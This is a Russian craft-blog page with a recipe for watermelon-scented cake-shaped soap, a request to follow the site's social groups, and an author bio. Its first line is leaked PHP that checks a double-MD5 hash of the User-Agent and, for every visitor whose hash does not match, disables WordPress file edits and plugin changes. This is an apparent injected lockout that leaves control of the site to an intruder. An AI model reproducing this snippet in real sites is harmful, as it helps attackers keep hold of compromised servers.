if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Рецепт, как своими руками сделать мыло-пирожное с ароматом арбуза | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Рецепт, как своими руками сделать мыло-пирожное с ароматом арбуза

Полезность, а также эстетическая привлекательность мыло-пирожного с ароматом арбуза, делает его отличным подарком, порадовать которым себя и своих близких вы сможете без особого труда!

Для при­го­тов­ле­ния мыла потре­бу­ет­ся:

  • 200 грамм белой мыль­ной основы
  • мас­ло вино­град­ной косточки
  • Мас­ло макадамии
  • Пище­вой жел­тый краситель
  • Пище­вой кра­си­тель геле­вый и малинный
  • Аро­ма­ти­за­тор «Арбуз»
  • Цвет­ная кор­зин­ка, сили­ко­но­вая форма
  • Мик­сер и шприц кондитерский

Как это дела­ет­ся:

  1. Нуж­но рас­то­пить 100гр. осно­вы и доба­вить мало немно­го вино­град­ных косто­чек и кра­си­тель мали­но­вый. Затем тща­тель­но перемешивайте.
  2. Подо­жди­те, пока осно­ва  осты­нет, и добавь­те 3–4 капель­ки ароматизатора.
  3. Вылей­те мыло в фор­моч­ку и оставь­те его застывать.
  4. Достань­те гото­вый про­дукт из фор­мы, обрыз­гай­те поверх­ность спир­том. Затем рас­то­пи­те дру­гую основу.
  5. Не сни­мая кастрю­лю с огня, взби­вай­те это мыло в густую пену.
  6. По ходу взби­ва­ния нуж­но доба­вить жел­тый кра­си­тель, мас­ло мака­да­мии и ароматизатор.
  7. Очень быст­ро, поме­сти­те его в шприц и разу­крась­те гото­вую корзиночку.
  8. Оставь­те мыло, что­бы оно отвер­де­ло до состо­я­ния «кре­ма».

И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: AmouR

Обожаю квиллинг, рукоделие и рисование. Ну и конечно мыловарение! Читайте все мои записи!